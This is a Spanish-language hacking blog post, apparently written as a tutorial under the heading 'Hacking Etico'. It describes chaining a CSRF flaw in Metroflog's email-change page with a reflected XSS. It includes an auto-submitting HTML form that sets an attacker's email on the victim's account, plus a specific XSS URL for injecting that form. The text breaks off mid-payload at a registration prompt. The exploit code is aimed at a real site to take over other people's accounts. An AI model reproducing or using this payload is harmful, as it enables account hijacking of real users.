Hacking Etico
Hola a todos.. me aburria por el msn con kaOs! y zerito, así que nos pusimos a leer el articulo de mx0x sobre xss en metroflog y se me ocurrió queseguramente habria csrf en algún sitio, sino no me podía explicar que owneara tantas cuentas. Doy paso al minituto:
Para comprobar si existe algun csrf necesito una cuenta, abro el msn y le digo a ka0s "chetenes alguna cuenta en metroflog", el me responde: "sisi usa la mia que soy re flogger ahrre".
Una vez logeado me fuí directamente a configuración y con una sencilla prueba confirmo que el cambiode mail es vulnerable a csrf. La sencilla prueba consiste en cambair el mail y darle a enviar :P!
El segundo paso es verificar que no tenga algún filtro que me impida la explotación remota, paraesto creo un simple form en local con el siguiente content:
<form method="post" name="formx" action='http://www.metroflog.com/accountinfo.php'>
<tablewidth="500" border="0" cellpadding="2" cellspacing="0" class="ben">
<input type="text" name="email" maxlength="50" value="tumailx@hotmail.com" size="35"></td><td><input type="submit" name="actualizar" value="Actualizar"></td>
</form>
<script>document.formx.submit();</script>
Eso loque hace es enviar la solicitud de cambio de mail a mf, tras ejecutarlo verifico que no funciona, seguramente comprueban el referer y si es externo a metroflog no te dejan cambiarlo... que cagada!Entonces recuerdo el xss y se me ocurre meter todo el autopost dentro de un xss, a ver si funciona:
El xss en cuestión es en:http://www.metroflog.com/dangerously-cute/20081014/n_la_termo?pos=
Y el código del autopost es:
"><form method="post" name="formx" action='http://www.metroflog.com/accountinfo.php'>
<table width="500"...
Regístrate para leer el documento completo.